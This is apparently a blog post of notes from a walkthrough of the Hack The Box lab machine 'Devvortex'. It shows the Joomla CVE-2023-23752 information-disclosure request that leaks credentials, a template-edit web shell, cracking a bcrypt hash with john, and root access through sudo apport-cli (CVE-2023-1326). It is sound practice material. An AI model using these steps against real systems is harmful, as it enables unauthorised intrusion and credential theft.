chidunguyen.com

DEVVORTEX-HTB Notes

Devvortrex-HTB

Written by

Du

in

Here is my notes on DEVVORTEX box from Hackthebox.

DEVVORTEX: 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)

devvortex.htb

┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb'  --hl 7
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://devvortex.htb/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000000022:   200        501 L    1581 W     23221 Ch    "dev"    


dev.devvortex.htb - joomla site ! 

http://dev.devvortex.htb/robots.txt: 

Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/   

http://dev.devvortex.htb/administrator/manifests/files/joomla.xml - very interesting. 

<folder>administrator</folder>
<folder>api</folder>
<folder>cache</folder>
<folder>cli</folder>
<folder>components</folder>
<folder>images</folder>
<folder>includes</folder>
<folder>language</folder>
<folder>layouts</folder>
<folder>libraries</folder>
<folder>media</folder>
<folder>modules</folder>
<folder>plugins</folder>
<folder>templates</folder>
<folder>tmp</folder>
<file>htaccess.txt</file>
<file>web.config.txt</file>
<file>LICENSE.txt</file>
<file>README.txt</file>
<file>index.php</file>

/web.config.txt 

joomla version 4.2.6 Vulnerable to information disclosure exploit (CVE-2023-23752)

http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

{"type":"application","id":"224","attributes":{"user":"lewis","id":224}},{"type":"application","id":"224","attributes":{"password":"[REDIRECTED]","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"sd4fg_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":

lewis:[REDIRECTED]

#Able to login lewis creds to joomla service. 


http://dev.devvortex.htb/api/index.php/v1/users?public=true

lewis = Super Users


-Able to modify template to gain a shell. 

#Make sure it's an adminstrator template one because the other one is locked. 

Web-Shell to User Shell !

https://exploit-notes.hdks.org/exploit/web/cms/joomla-cms-pentesting/

https://hackertarget.com/attacking-enumerating-joomla/

https://www.exploit-db.com/exploits/51334

https://vulncheck.com/blog/joomla-for-rce


Reverse shell on any CMS


https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla



PRIV ESC: 

www-data -> logan: 

mysql: 

#With lewis creds. 

Users_Tables: 

logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M[REDIRECTED]



#Crack it with john the ripper. 

┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDIRECTED]    (logan)     
1g 0:00:00:12 DONE (2023-12-13 12:56) 0.07733g/s 108.5p/s 108.5c/s 108.5C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


logan:[REDIRECTED]

SSH with logan creds = USER SHELL ! 


USER.TXT: [REDIRECTED]


logan -> root: 


logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ 


Create a report then press v and !/bin/bash to gain a root shell ! 

sudo /usr/bin/apport-cli -f

What would you like to do? Your options are:
  S: Send report (89.8 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# 




https://github.com/diego-tella/CVE-2023-1326-PoC


root@devvortex:/home/logan# cd /root
root@devvortex:~# ls
root.txt
root@devvortex:~# cat root.txt
[REDIRECTED]
root@devvortex:~# 

ROOT.TXT: [REDIRECTED]








Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thanks you for reading my note !

More posts